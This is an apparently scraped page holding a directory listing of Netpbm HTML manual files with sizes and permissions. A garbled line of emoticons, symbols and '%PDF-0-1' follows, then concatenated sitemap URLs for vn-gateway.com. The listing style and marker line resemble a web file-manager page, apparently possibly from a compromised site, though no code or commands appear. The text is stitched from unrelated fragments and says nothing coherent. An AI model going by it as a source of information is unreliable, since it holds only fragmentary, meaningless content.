pnmcolormap.html File 8.08 KB 0644
pnmcomp.html File 2.05 KB 0644
pnmconvol.html File 13.66 KB 0644
pnmcrop.html File 6.18 KB 0644
pnmcut.html File 966 B 0644
pnmdepth.html File 843 B 0644
pnmfile.html File 509 B 0644
pnmflip.html File 1.06 KB 0644
pnmgamma.html File 12.02 KB 0644
pnmhisteq.html File 6.64 KB 0644
pnmhistmap.html File 5.21 KB 0644
pnmindex.html File 3.14 KB 0644
pnminterp.html File 569 B 0644
pnminvert.html File 1.27 KB 0644
pnmmargin.html File 1.77 KB 0644
pnmmercator.html File 5.44 KB 0644
pnmmontage.html File 4.65 KB 0644
pnmnlfilt.html File 7.24 KB 0644
pnmnoraw.html File 751 B 0644
pnmnorm.html File 12.08 KB 0644
pnmpad.html File 4.78 KB 0644
pnmpaste.html File 3.63 KB 0644
pnmpsnr.html File 2.1 KB 0644
pnmquant.html File 2.65 KB 0644
pnmquantall.html File 2.44 KB 0644
pnmremap.html File 10.68 KB 0644
pnmrotate.html File 4.94 KB 0644
pnmscale.html File 1.02 KB 0644
pnmscalefixed.html File 2.67 KB 0644
pnmshear.html File 3.81 KB 0644
pnmsmooth.html File 4.81 KB 0644
pnmsplit.html File 676 B 0644
pnmstitch.html File 4.03 KB 0644
pnmtile.html File 1.4 KB 0644
pnmtoddif.html File 2.26 KB 0644
pnmtofiasco.html File 10.94 KB 0644
pnmtofits.html File 495 B 0644
pnmtojbig.html File 9.61 KB 0644
pnmtojpeg.html File 21.34 KB 0644
pnmtopalm.html File 9.73 KB 0644
pnmtopclxl.html File 7.18 KB 0644
pnmtoplainpnm.html File 733 B 0644
pnmtopng.html File 18.21 KB 0644
pnmtopnm.html File 2.51 KB 0644
pnmtops.html File 18.44 KB 0644
pnmtorast.html File 1.53 KB 0644
pnmtorle.html File 3.25 KB 0644
pnmtosgi.html File 1.96 KB 0644
pnmtosir.html File 1.14 KB 0644
pnmtotiff.html File 499 B 0644
pnmtotiffcmyk.html File 7.06 KB 0644
pnmtoxwd.html File 1.69 KB 0644
ppm.html File 7.53 KB 0644
ppm3d.html File 4.29 KB 0644
ppmbrighten.html File 5.65 KB 0644
ppmchange.html File 5.5 KB 0644
ppmcie.html File 13.67 KB 0644
ppmcolormask.html File 3.95 KB 0644
ppmdcfont.html File 1.63 KB 0644
ppmddumpfont.html File 1.11 KB 0644
ppmdim.html File 1.24 KB 0644
ppmdist.html File 2.07 KB 0644
ppmdither.html File 2.39 KB 0644
ppmdmkfont.html File 1.26 KB 0644
ppmdraw.html File 8.43 KB 0644
ppmfade.html File 4.86 KB 0644
ppmflash.html File 2.04 KB 0644
ppmforge.html File 16.43 KB 0644
ppmglobe.html File 5.02 KB 0644
ppmhist.html File 5.77 KB 0644
ppmlabel.html File 5.82 KB 0644
ppmmake.html File 1.9 KB 0644
ppmmix.html File 2.21 KB 0644
ppmnorm.html File 538 B 0644
ppmntsc.html File 3.06 KB 0644
ppmpat.html File 2.99 KB 0644
ppmquant.html File 2.82 KB 0644
ppmquantall.html File 841 B 0644
ppmrainbow.html File 3.38 KB 0644
ppmrelief.html File 1.25 KB 0644
ppmrough.html File 4.85 KB 0644
ppmshadow.html File 9.94 KB 0644
ppmshift.html File 2.4 KB 0644
ppmspread.html File 1.37 KB 0644
ppmsvgalib.html File 4.55 KB 0644
ppmtoacad.html File 5.64 KB 0644
ppmtoapplevol.html File 1.34 KB 0644
ppmtoarbtxt.html File 5.09 KB 0644
ppmtoascii.html File 2.41 KB 0644
ppmtobmp.html File 3.99 KB 0644
ppmtoeyuv.html File 1.28 KB 0644
ppmtogif.html File 2.76 KB 0644
ppmtoicr.html File 3.77 KB 0644
ppmtoilbm.html File 5.25 KB 0644
ppmtojpeg.html File 590 B 0644
ppmtoleaf.html File 1.15 KB 0644
ppmtolj.html File 1.97 KB 0644
ppmtomitsu.html File 4.1 KB 0644
ppmtompeg-par.gif File 36.52 KB 0644
ppmtompeg-snr.gif File 2.3 KB 0644
ppmtompeg.html File 45.06 KB 0644
ppmtoneo.html File 1.07 KB 0644
ppmtopcx.html File 5.92 KB 0644
ppmtopgm.html File 2.09 KB 0644
ppmtopi1.html File 1.14 KB 0644
ppmtopict.html File 1.67 KB 0644
ppmtopj.html File 2.89 KB 0644
ppmtopjxl.html File 3.02 KB 0644
ppmtoppm.html File 1.8 KB 0644
ppmtopuzz.html File 1.17 KB 0644
ppmtorgb3.html File 1.55 KB 0644
ppmtosixel.html File 2.67 KB 0644
ppmtospu.html File 2.79 KB 0644
ppmtoterm.html File 3.07 KB 0644
ppmtotga.html File 541 B 0644
ppmtouil.html File 395 B 0644
ppmtowinicon.html File 3.99 KB 0644
ppmtoxpm.html File 6.92 KB 0644
ppmtoyuv.html File 2.84 KB 0644
ppmtoyuvsplit.html File 1.92 KB 0644
ppmtv.html File 1.58 KB 0644
ppmwheel.html File 1.84 KB 0644
psidtopgm.html File 1.88 KB 0644
pstopnm.html File 17.77 KB 0644
qrttoppm.html File 978 B 0644
rasttopnm.html File 2.13 KB 0644
rawtopgm.html File 5.19 KB 0644
rawtoppm.html File 2.98 KB 0644
rgb3toppm.html File 1.27 KB 0644
rlatopam.html File 1.34 KB 0644
rletopnm.html File 3.79 KB 0644
sbigtopgm.html File 1.3 KB 0644
sgitopnm.html File 2.57 KB 0644
sirtopnm.html File 1.22 KB 0644
sldtoppm.html File 5.89 KB 0644
spctoppm.html File 1.08 KB 0644
spottopgm.html File 2.62 KB 0644
sputoppm.html File 1.02 KB 0644
srftopam.html File 1.86 KB 0644
sunicontopnm.html File 2.77 KB 0644
testimg.png File 48.11 KB 0644
testimg_histbar.png File 1.08 KB 0644
testimg_histdot.png File 1014 B 0644
tgatoppm.html File 2.12 KB 0644
thinkjettopbm.html File 1.75 KB 0644
tifftopnm.html File 13.13 KB 0644
vidtoppm.html File 755 B 0644
wbmptopbm.html File 1.31 KB 0644
winicon.html File 4.6 KB 0644
winicontopam.html File 3.25 KB 0644
winicontoppm.html File 2.86 KB 0644
xbmtopbm.html File 1.04 KB 0644
ximtoppm.html File 2.14 KB 0644
xpmtoppm.html File 2.92 KB 0644
xvminitoppm.html File 1.38 KB 0644
xwdtopnm.html File 4.57 KB 0644
ybmtopbm.html File 1.12 KB 0644
yuvsplittoppm.html File 1.68 KB 0644
yuvtoppm.html File 1.54 KB 0644
zeisstopnm.html File 1.33 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml